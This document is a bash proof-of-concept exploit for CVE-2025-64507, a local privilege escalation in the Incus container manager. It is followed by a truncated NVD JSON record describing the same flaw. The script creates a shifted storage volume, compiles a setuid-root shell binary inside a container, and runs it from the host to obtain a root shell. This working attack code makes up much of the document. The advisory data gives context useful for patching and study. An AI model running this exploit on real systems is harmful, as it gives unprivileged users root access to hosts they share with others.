CVE-2025-64507

#!/bin/bash # CVE-2025-64507 PoC - Incus Local Privilege Escalation # Prerequisites: User must be in 'incus' group and have access to incus-user set -e INCUS_IMAGE="ubuntu:22.04" VOLUME_NAME="exploit-volume-$$" CONTAINER_NAME="privesc-container-$$" # Step 1: Create custom storage volume with security.shifted=true echo "[+] Creating custom storage volume with security.shifted=true..." lxc storage volume create default $VOLUME_NAME --type custom security.shifted=true 2>/dev/null || true # Step 2: Launch container and attach the volume echo "[+] Launching container..." lxc launch $INCUS_IMAGE $CONTAINER_NAME # Step 3: Attach the volume to the container echo "[+] Attaching custom volume to container..." lxc config device add $CONTAINER_NAME exploit-volume disk source=$VOLUME_NAME path=/exploit # Step 4: Create setuid binary inside container echo "[+] Creating setuid binary inside container..." lxc exec $CONTAINER_NAME -- bash -c ' cat > /exploit/privesc.c << "EOF" #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main() { setuid(0); setgid(0); system("/bin/bash -p"); return 0; } EOF gcc /exploit/privesc.c -o /exploit/privesc chmod 4755 /exploit/privesc ' # Step 5: Execute setuid binary from host to gain root echo "[+] Executing setuid binary to gain root privileges..." echo "[!] If exploitation successful, you should now have root shell" $HOME/.local/share/incus/storage-pools/default/$VOLUME_NAME/privesc || \ /var/lib/incus/storage-pools/default/$VOLUME_NAME/privesc || \ echo "[!] Manual execution required from host" # Cleanup echo "[+] Cleaning up..." lxc stop $CONTAINER_NAME 2>/dev/null || true lxc delete $CONTAINER_NAME 2>/dev/null || true lxc storage volume delete default $VOLUME_NAME 2>/dev/null || true

{"cve": {"id": "CVE-2025-64507", "sourceIdentifier": "[email protected]", "published": "2025-11-10T22:15:39.460", "lastModified": "2025-12-29T16:29:38.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incus is a system container and virtual machine manager. An issue in versions prior to 6.0.6 and 6.19.0 affects any Incus user in an environment where an unprivileged user may have root access to a container with an attached custom storage volume that has the `security.shifted` property set to `true` as well as access to the host as an unprivileged user. The most common case for this would be systems using `incus-user` with the less privileged `incus` group to provide unprivileged users with an isolated restricted access to Incus. Such users may be able to create a custom storage volume with the necessary property (depending on kernel and filesystem support) and can then write a setuid binary from within the container which can be executed as an unprivileged user on the host to gain root privileges. A patch for this issue is expected in versions 6.0.6 and 6.19.0. As a workaround, permissions can be manually restricted until a patched version of Incus is deployed."}, {"lang": "es", "value": "Incus es un gestor de contenedores de sistema y máquinas virtuales. Un problema en versiones anteriores a la 6.0.6 y 6.19.0 afecta a cualquier usuario de Incus en un entorno donde un usuario sin privilegios puede tener acceso root a un contenedor con un volumen de almacenamiento personalizado adjunto que tiene la propiedad 'security.shifted' establecida en 'true', así como acceso al host como usuario sin privilegios. El caso más común para esto serían los sistemas que utilizan 'incus-user' con el grupo 'incus' menos privilegiado para proporcionar a los usuarios sin privilegios un acceso restringido y aislado a Incus. Dichos usuarios pueden ser capaces de crear un volumen de almacenamiento personalizado con la propiedad necesaria (dependiendo del soporte del kernel y del sistema de archivos) y luego pueden escribir un binario setuid desde dentro del contenedor que puede ser ejecutado como un usuario sin privilegios en el host para obtener privilegios de root. Se espera un parche para este problema en las versiones 6.0.6 y 6.19.0. Como solución alternativa, los permisos pueden ser restringidos manualmente hasta que se implemente una versión parcheada de Incus."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.0.6", "matchCriteriaId": "22A65942-B80B-4A93-ADF9-AF639CE3C1BE"}, {"vulnerable": true, "cri ... (truncated)